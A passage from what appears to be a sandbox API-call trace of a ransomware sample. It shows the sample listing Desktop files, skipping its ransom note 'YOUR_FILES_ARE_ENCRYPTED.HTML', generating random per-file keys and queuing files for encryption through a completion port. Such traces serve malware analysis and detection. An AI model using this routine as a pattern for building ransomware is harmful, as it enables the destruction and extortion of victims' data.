dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0165.854] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=58192) returned 1 [0165.855] GetProcessHeap () returned 0x270000 [0165.855] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0165.858] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="2C") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="D2") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="F3") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="BA") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="56") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="9A") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="7D") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="6B") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="64") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="C8") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="ED") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="E1") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="19") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="AC") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="63") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="01") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="14") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="E9") returned 2 [0165.858] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="7D") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="8B") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="19") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="03") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="23") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="AF") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="30") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="57") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="A6") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="37") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="73") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="AF") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="EE") returned 2 [0165.859] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="4B") returned 2 [0165.860] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\6 IQKF_vkJtPe8lb.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\6 IQKF_vkJtPe8lb.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\6 IQKF_vkJtPe8lb.jpg" [0165.860] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.860] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0165.860] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92716370, ftCreationTime.dwHighDateTime=0x1d7d88a, ftLastAccessTime.dwLowDateTime=0x6bd93a20, ftLastAccessTime.dwHighDateTime=0x1d7e15f, ftLastWriteTime.dwLowDateTime=0x6bd93a20, ftLastWriteTime.dwHighDateTime=0x1d7e15f, nFileSizeHigh=0x0, nFileSizeLow=0x13f9c, dwReserved0=0x0, dwReserved1=0x60, cFileName="AtF590.mp3", cAlternateFileName="")) returned 1 [0165.860] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\AtF590.mp3") returned 42 [0165.860] lstrcmpW (lpString1="AtF590.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.860] PathFindExtensionW (pszPath="AtF590.mp3") returned=".mp3" [0165.860] lstrlenW (lpString=".mp3") returned 4 [0165.860] PathFindExtensionW (pszPath="AtF590.mp3") returned=".mp3" [0165.860] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0165.860] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\AtF590.mp3" (normalized: "c:\\users\\5alr3u30d3\\desktop\\atf590.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0165.862] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=81820) returned 1 [0165.862] GetProcessHeap () returned 0x270000 [0165.862] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0165.865] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="A1") returned 2 [0165.865] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="8F") returned 2 [0165.865] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="EC") returned 2 [0165.865] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="9F") returned 2 [0165.865] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="DA") returned 2 [0165.865] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="8D") returned 2 [0165.865] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="94") returned 2 [0165.865] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="AB") returned 2 [0165.865] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="F3") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="EC") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="54") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="91") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="88") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="B3") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="C4") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="7D") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="EC") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="A5") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="95") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="F7") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="2D") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="6E") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="2D") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="FE") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="9A") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="70") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="D3") returned 2 [0165.866] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="CE") returned 2 [0165.867] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="E2") returned 2 [0165.867] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="87") returned 2 [0165.867] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="1D") returned 2 [0165.867] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="0C") returned 2 [0165.867] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\AtF590.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\AtF590.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\AtF590.mp3" [0165.867] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.868] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0165.868] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x999a8b30, ftCreationTime.dwHighDateTime=0x1d7d804, ftLastAccessTime.dwLowDateTime=0x7adb2410, ftLastAccessTime.dwHighDateTime=0x1d7e444, ftLastWriteTime.dwLowDateTime=0x7adb2410, ftLastWriteTime.dwHighDateTime=0x1d7e444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ccAy71X", cAlternateFileName="")) returned 1 [0165.868] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X") returned 39 [0165.868] GetProcessHeap () returned 0x270000 [0165.868] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0165.868] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X" [0165.868] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\*" [0165.868] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x999a8b30, ftCreationTime.dwHighDateTime=0x1d7d804, ftLastAccessTime.dwLowDateTime=0x7adb2410, ftLastAccessTime.dwHighDateTime=0x1d7e444, ftLastWriteTime.dwLowDateTime=0x7adb2410, ftLastWriteTime.dwHighDateTime=0x1d7e444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0165.868] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x999a8b30, ftCreationTime.dwHighDateTime=0x1d7d804, ftLastAccessTime.dwLowDateTime=0x7adb2410, ftLastAccessTime.dwHighDateTime=0x1d7e444, ftLastWriteTime.dwLowDateTime=0x7adb2410, ftLastWriteTime.dwHighDateTime=0x1d7e444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0165.868] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6b61510, ftCreationTime.dwHighDateTime=0x1d7d841, ftLastAccessTime.dwLowDateTime=0x724778e0, ftLastAccessTime.dwHighDateTime=0x1d7dc50, ftLastWriteTime.dwLowDateTime=0x724778e0, ftLastWriteTime.dwHighDateTime=0x1d7dc50, nFileSizeHigh=0x0, nFileSizeLow=0xa08d, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="-eVB6BoVlSlD5U.wav", cAlternateFileName="-EVB6B~1.WAV")) returned 1 [0165.868] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\-eVB6BoVlSlD5U.wav") returned 58 [0165.869] lstrcmpW (lpString1="-eVB6BoVlSlD5U.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.869] PathFindExtensionW (pszPath="-eVB6BoVlSlD5U.wav") returned=".wav" [0165.869] lstrlenW (lpString=".wav") returned 4 [0165.869] PathFindExtensionW (pszPath="-eVB6BoVlSlD5U.wav") returned=".wav" [0165.869] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\-eVB6BoVlSlD5U.wav" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ccay71x\\-evb6bovlsld5u.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0165.873] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=41101) returned 1 [0165.873] GetProcessHeap () returned 0x270000 [0165.873] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75f0050 [0165.878] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="93") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="D5") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="2B") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="48") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="4F") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="32") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="F3") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="B4") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="EE") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="81") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="A4") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="35") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="B1") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="88") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="81") returned 2 [0165.878] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="63") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="EE") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="D8") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="AF") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="66") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="DA") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="99") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="55") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="49") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="41") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="A1") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="E8") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="28") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="DD") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="76") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="AB") returned 2 [0165.879] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="6C") returned 2 [0165.880] lstrcpyW (in: lpString1=0x7600104, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\-eVB6BoVlSlD5U.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\-eVB6BoVlSlD5U.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\-eVB6BoVlSlD5U.wav" [0165.880] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x75f0050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.880] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75f0050, lpOverlapped=0x75f0050) returned 1 [0165.880] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf95a69e0, ftCreationTime.dwHighDateTime=0x1d7df0d, ftLastAccessTime.dwLowDateTime=0x49643530, ftLastAccessTime.dwHighDateTime=0x1d7e574, ftLastWriteTime.dwLowDateTime=0x49643530, ftLastWriteTime.dwHighDateTime=0x1d7e574, nFileSizeHigh=0x0, nFileSizeLow=0xa319, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="0W_eZ.png", cAlternateFileName="")) returned 1 [0165.880] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\0W_eZ.png") returned 49 [0165.880] lstrcmpW (lpString1="0W_eZ.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.880] PathFindExtensionW (pszPath="0W_eZ.png") returned=".png" [0165.881] lstrlenW (lpString=".png") returned 4 [0165.881] PathFindExtensionW (pszPath="0W_eZ.png") returned=".png" [0165.881] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\0W_eZ.png" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ccay71x\\0w_ez.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0165.884] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=41753) returned 1 [0165.884] GetProcessHeap () returned 0x270000 [0165.884] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76181a8 [0165.889] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="6F") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="19") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="0D") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="B4") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="9F") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="6E") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="35") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="7C") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="D6") returned 2 [0165.889] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="E6") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="E0") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D4") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="CD") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="C5") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="51") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="42") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="5F") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="93") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="3C") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="61") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="11") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="2B") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="DD") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="0A") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="12") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="8E") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="45") returned 2 [0165.890] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="B4") returned 2 [0165.891] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="5D") returned 2 [0165.891] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="19") returned 2 [0165.891] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="1F") returned 2 [0165.891] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="7F") returned 2 [0165.891] lstrcpyW (in: lpString1=0x762825c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\0W_eZ.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\0W_eZ.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\0W_eZ.png" [0165.891] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x76181a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.892] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76181a8, lpOverlapped=0x76181a8) returned 1 [0165.892] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a3daf80, ftCreationTime.dwHighDateTime=0x1d7e4b5, ftLastAccessTime.dwLowDateTime=0xeba5afc0, ftLastAccessTime.dwHighDateTime=0x1d7e544, ftLastWriteTime.dwLowDateTime=0xeba5afc0, ftLastWriteTime.dwHighDateTime=0x1d7e544, nFileSizeHigh=0x0, nFileSizeLow=0xb9ee, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="9XDWC.bmp", cAlternateFileName="")) returned 1 [0165.892] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\9XDWC.bmp") returned 49 [0165.892] lstrcmpW (lpString1="9XDWC.bmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.892] PathFindExtensionW (pszPath="9XDWC.bmp") returned=".bmp" [0165.892] lstrlenW (lpString=".bmp") returned 4 [0165.892] PathFindExtensionW (pszPath="9XDWC.bmp") returned=".bmp" [0165.892] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10dde670, ftCreationTime.dwHighDateTime=0x1d7e36c, ftLastAccessTime.dwLowDateTime=0x891456b0, ftLastAccessTime.dwHighDateTime=0x1d7e6f0, ftLastWriteTime.dwLowDateTime=0x891456b0, ftLastWriteTime.dwHighDateTime=0x1d7e6f0, nFileSizeHigh=0x0, nFileSizeLow=0xf6b0, dwReserved0=0xff3db2bb, dwReserved1=0xffffffff, cFileName="fCOxneQ.ods", cAlternateFileName="")) returned 1 [0165.892] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\fCOxneQ.ods") returned 51 [0165.892] lstrcmpW (lpString1="fCOxneQ.ods", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.892] PathFindExtensionW (pszPath="fCOxneQ.ods") returned=".ods" [0165.892] lstrlenW (lpString=".ods") returned 4 [0165.892] PathFindExtensionW (pszPath="fCOxneQ.ods") returned=".ods" [0165.892] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\fCOxneQ.ods" (normalized: "c:\\users\\5alr3u30d3\\desktop\\ccay71x\\fcoxneq.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0165.904] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=63152) returned 1 [0165.904] GetProcessHeap () returned 0x270000 [0165.904] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76181a8 [0165.905] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="28") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="E9") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="B4") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="F8") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="81") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="13") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="1A") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="BC") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="FB") returned 2 [0165.905] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: 